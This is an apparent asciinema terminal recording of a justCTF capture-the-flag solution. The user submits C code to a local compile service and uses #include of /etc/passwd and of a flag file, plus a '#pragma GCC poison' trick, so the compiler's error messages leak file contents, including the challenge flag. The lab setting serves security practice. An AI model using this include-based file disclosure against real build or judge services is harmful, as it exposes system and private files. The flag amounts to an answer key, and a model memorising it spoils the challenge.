{"version": 2, "width": 147, "height": 44, "timestamp": 1576704050, "env": {"SHELL": "/usr/bin/zsh", "TERM": "rxvt-unicode-256color"}}
[0.264104, "o", "\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[m                                                                                                                                                  \r \r"]
[0.274686, "o", "\r\u001b[m\u001b[27m\u001b[24m\u001b[J\u001b[01;32m➜  \u001b[36mmisc_not-so-ppc\u001b[00m \u001b[01;34mgit:(\u001b[31mmisc_not-so-ppc\u001b[34m) \u001b[33m✗\u001b[00m \u001b[K"]
[0.275189, "o", "\u001b="]
[0.275552, "o", "\u001b[?2004h"]
[1.060502, "o", "\u001b[1m\u001b[31mn\u001b[m\u001b[39m"]
[1.172837, "o", "\b\u001b[m\u001b[32mn\u001b[32mc\u001b[39m"]
[1.486342, "o", " localhost 1337"]
[1.973134, "o", "\u001b>"]
[1.974818, "o", "\u001b[?2004l\r\r\n"]
[1.975545, "o", "\u001b]2;nc localhost 1337\u0007\u001b]1;nc\u0007"]
[2.016431, "o", "How many lines does your program have?\r\n"]
[2.585731, "o", "1"]
[2.826799, "o", "\r\n"]
[2.827272, "o", "Write your program now:\r\n"]
[3.153636, "o", "#"]
[3.435011, "o", "i"]
[3.515224, "o", "n"]
[3.653827, "o", "c"]
[3.77185, "o", "l"]
[3.846769, "o", "u"]
[3.889392, "o", "d"]
[3.980084, "o", "e"]
[4.071074, "o", " "]
[4.322422, "o", "\""]
[4.600972, "o", "/"]
[4.75271, "o", "e"]
[4.81724, "o", "t"]
[4.989784, "o", "c"]
[5.059353, "o", "/"]
[5.319624, "o", "p"]
[5.41057, "o", "a"]
[5.619963, "o", "s"]
[5.744526, "o", "s"]
[5.974908, "o", "w"]
[6.050098, "o", "d"]
[6.312588, "o", "\""]
[6.556979, "o", "\r\n"]
[6.559814, "o", "Ok, let's build it!\r\n"]
[6.571635, "o", "In file included from <stdin>:1:0:\r\n/etc/passwd:1:8: error: expected '=', ',', ';', 'asm' or '__attribute__' before ':' token\r\n aturing:x:1000:1000::/home/aturing:/bin/sh\r\n        ^\r\nCOMPILATION FAILED\r\n"]
[6.607071, "o", "\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[m                                                                                                                                                  \r \r"]
[6.625805, "o", "\r\u001b[m\u001b[27m\u001b[24m\u001b[J\u001b[01;32m➜  \u001b[36mmisc_not-so-ppc\u001b[00m \u001b[01;34mgit:(\u001b[31mmisc_not-so-ppc\u001b[34m) \u001b[33m✗\u001b[00m \u001b[K"]
[6.626083, "o", "\u001b="]
[6.627031, "o", "\u001b[?2004h"]
[7.591238, "o", "\u001b[1m\u001b[31mn\u001b[m\u001b[39m"]
[7.655182, "o", "\b\u001b[m\u001b[32mn\u001b[32mc\u001b[39m"]
[7.901115, "o", " localhost 1337"]
[8.183397, "o", "\u001b>"]
[8.188339, "o", "\u001b[?2004l\r\r\n"]
[8.189349, "o", "\u001b]2;nc localhost 1337\u0007\u001b]1;nc\u0007"]
[8.23304, "o", "How many lines does your program have?\r\n"]
[9.320541, "o", "2"]
[9.518301, "o", "\r\n"]
[9.519074, "o", "Write your program now:\r\n"]
[10.866441, "o", "#"]
[11.097154, "o", "p"]
[11.227857, "o", "r"]
[11.308104, "o", "a"]
[11.521181, "o", "g"]
[11.917396, "o", "m"]
[11.997447, "o", "a"]
[12.115142, "o", " "]
[12.350396, "o", "G"]
[12.564189, "o", "C"]
[12.69747, "o", "C"]
[13.21208, "o", " "]
[13.452612, "o", "o"]
[13.934973, "o", "\b \b"]
[14.203944, "o", "p"]
[14.278815, "o", "o"]
[14.518282, "o", "i"]
[14.690823, "o", "s"]
[14.815028, "o", "o"]
[14.9005, "o", "n"]
[15.577808, "o", " "]
[16.403515, "o", "j"]
[16.550804, "o", "u"]
[16.648714, "o", "s"]
[16.845917, "o", "t"]
[17.235848, "o", "C"]
[17.471135, "o", "T"]
[17.657911, "o", "F"]
[18.052695, "o", "\r\n"]
[18.352413, "o", "#"]
[18.649099, "o", "i"]
[18.729407, "o", "n"]
[18.890062, "o", "c"]
[19.0129, "o", "l"]
[19.055728, "o", "u"]
[19.135697, "o", "d"]
[19.216004, "o", "e"]
[19.301666, "o", " "]
[19.536878, "o", "\""]
[19.7582, "o", "/"]
[20.041593, "o", "h"]
[20.105899, "o", "o"]
[20.427193, "o", "m"]
[20.51273, "o", "e"]
[20.671806, "o", "/"]
[20.8266, "o", "a"]
[21.015391, "o", "t"]
[21.095769, "o", "u"]
[21.186399, "o", "r"]
[21.272187, "o", "i"]
[21.46001, "o", "n"]
[21.545518, "o", "g"]
[22.31902, "o", "/"]
[22.690724, "o", "f"]
[22.787374, "o", "l"]
[22.891502, "o", "a"]
[22.998619, "o", "g"]
[23.274636, "o", "\""]
[23.617677, "o", "\r\n"]
[23.619658, "o", "Ok, let's build it!\r\n"]
[23.634154, "o", "In file included from <stdin>:2:0:\r\n/home/aturing/flag:1:1: error: attempt to use poisoned \"justCTF\"\r\n justCTF:is_this_the_real_flag__is_this_just_fantasy__open_your_eyes_look_bellow_in_the_file_and_see\r\n ^\r\n/home/aturing/flag:1:8: error: expected '=', ',', ';', 'asm' or '__attribute__' before ':' token\r\n justCTF:is_this_the_real_flag__is_this_just_fantasy__open_your_eyes_look_bellow_in_the_file_and_see\r\n        ^\r\n/home/aturing/flag:2:1: error: attempt to use poisoned \"justCTF\"\r\n justCTF{mama_just_got_a_flag}\r\n ^\r\nCOMPILATION FAILED\r\n"]
[23.673433, "o", "\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[m                                                                                                                                                  \r \r"]
[23.686075, "o", "\r\u001b[m\u001b[27m\u001b[24m\u001b[J\u001b[01;32m➜  \u001b[36mmisc_not-so-ppc\u001b[00m \u001b[01;34mgit:(\u001b[31mmisc_not-so-ppc\u001b[34m) \u001b[33m✗\u001b[00m \u001b[K"]
[23.686724, "o", "\u001b="]
[23.687248, "o", "\u001b[?2004h"]
[24.405612, "o", "\u001b[?2004l\r\r\n"]
